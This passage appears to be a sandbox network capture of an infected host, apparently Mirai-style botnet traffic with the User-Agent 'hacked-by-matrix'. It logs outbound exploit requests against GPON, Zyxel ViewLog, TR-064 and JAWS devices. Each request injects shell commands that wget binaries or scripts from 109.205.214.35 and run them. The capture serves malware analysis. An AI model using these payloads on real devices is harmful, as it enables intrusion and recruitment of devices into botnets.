                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:09.385668039 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:21:50 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1014192.168.2.135323813.88.188.1680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.227797985 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:10.093460083 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1015192.168.2.135786082.103.99.24380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.278997898 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.353513002 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:10.556320906 CET336INHTTP/1.1 405 Not Allowed
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=20
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>
                                                        Mar 21, 2024 05:23:10.556349993 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1016192.168.2.134585899.231.98.2337547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.324822903 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1017192.168.2.1350410104.20.79.19280
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.473480940 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1018192.168.2.135729852.72.233.1180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.479221106 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:23:09.573616028 CET78INHTTP/1.1 400 BAD_REQUEST
                                                        Content-Length: 0
                                                        Connection: Close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1019192.168.2.134272027.50.93.23980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.554039001 CET325OUTPOST /GponForm/diag_Form?images/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0
                                                        Mar 21, 2024 05:23:09.877541065 CET1286INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:23:09 GMT
                                                        Server: Apache
                                                        Upgrade: h2,h2c
                                                        Connection: Upgrade, close
                                                        Accept-Ranges: bytes
                                                        Vary: Accept-Encoding
                                                        Strict-Transport-Security: max-age=31536000
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: 0
                                                        Content-Type: text/html
                                                        Data Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20
                                                        Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC;
                                                        Mar 21, 2024 05:23:09.877670050 CET1286INData Raw: 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73
                                                        Data Ascii: } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; }
                                                        Mar 21, 2024 05:23:09.877800941 CET1286INData Raw: 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69
                                                        Data Ascii: %; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-se
                                                        Mar 21, 2024 05:23:09.877923965 CET1286INData Raw: 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6c 6f 61 74 3a 20 6c 65 66 74 3b
                                                        Data Ascii: t-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: le
                                                        Mar 21, 2024 05:23:09.878005981 CET1286INData Raw: 36 51 6a 2b 42 50 49 45 37 49 59 6d 54 79 77 31 4d 46 77 62 61 6b 73 61 79 62 53 78 44 43 41 34 53 54 46 2b 77 67 38 72 48 37 45 7a 4d 77 71 4e 69 62 59 33 38 6d 6c 76 58 4b 44 64 55 35 70 44 48 33 54 52 6b 6c 34 30 76 78 4a 6b 5a 2b 44 4f 32 4e
                                                        Data Ascii: 6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd
                                                        Mar 21, 2024 05:23:09.878104925 CET1286INData Raw: 74 56 51 33 52 77 68 76 4f 52 6f 33 63 6b 69 51 35 5a 4f 55 7a 6c 43 4f 4d 79 69 39 5a 2b 4c 58 52 45 68 53 35 69 71 72 49 34 51 6e 75 4e 6c 66 38 6f 56 45 62 4b 38 41 35 35 36 51 51 4b 30 4c 4e 72 54 6a 32 74 69 57 66 63 46 6e 68 30 68 50 49 70
                                                        Data Ascii: tVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hPIpYEVGjmBAe2b95U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZ
                                                        Mar 21, 2024 05:23:09.878186941 CET1190INData Raw: 54 6d 4e 74 2b 73 68 6b 52 65 4b 64 33 76 36 37 6e 50 39 63 4e 44 4a 48 76 6f 44 2b 2b 78 64 76 70 6f 76 58 4b 43 70 35 53 66 6f 47 78 48 73 6a 30 79 46 2b 49 77 48 55 75 73 37 73 6d 56 68 38 49 48 56 47 49 77 4a 74 4c 79 37 75 4e 36 50 65 2f 77
                                                        Data Ascii: TmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5SfoGxHsj0yF+IwHUus7smVh8IHVGIwJtLy7uN6Pe/wAnrBxOnAayISLWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiA
                                                        Mar 21, 2024 05:23:09.878247976 CET1286INData Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20
                                                        Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to aus.haz.com.au's <a href="mailto:notifications@not
                                                        Mar 21, 2024 05:23:09.878314018 CET378INData Raw: 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22
                                                        Data Ascii: panelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="cop


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1020192.168.2.135780883.89.195.1880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.640782118 CET423OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:23:09.877271891 CET521INHTTP/1.1 404 Not Found
                                                        Vary: Accept-Encoding
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Type: text/html
                                                        X-Content-Type-Options: nosniff
                                                        Date: Thu, 21 Mar 2024 05:23:08 GMT
                                                        Cache-Control: no-cache
                                                        Content-Length: 223
                                                        X-XSS-Protection: 1; mode=block
                                                        Connection: Keep-Alive
                                                        Accept-Ranges: bytes
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 72 65 3e 3c 2f 70 72 65 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><head> <title>Not Found</title> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"></head><body><h2>Access Error: 404 -- Not Found</h2><pre></pre></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1021192.168.2.1347024181.48.161.14580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:09.739363909 CET761INHTTP/1.1 400 Bad Request
                                                        Server: Mini web server 1.0 ZTE corp 2005.
                                                        Accept-Ranges: bytes
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        X-Content-Type-Options: nosniff
                                                        X-XSS-Protection: 1; mode=block
                                                        Content-Security-Policy: default-src 'self' 'unsafe-inline' 'unsafe-eval' data:
                                                        Cache-Control: no-cache,no-store
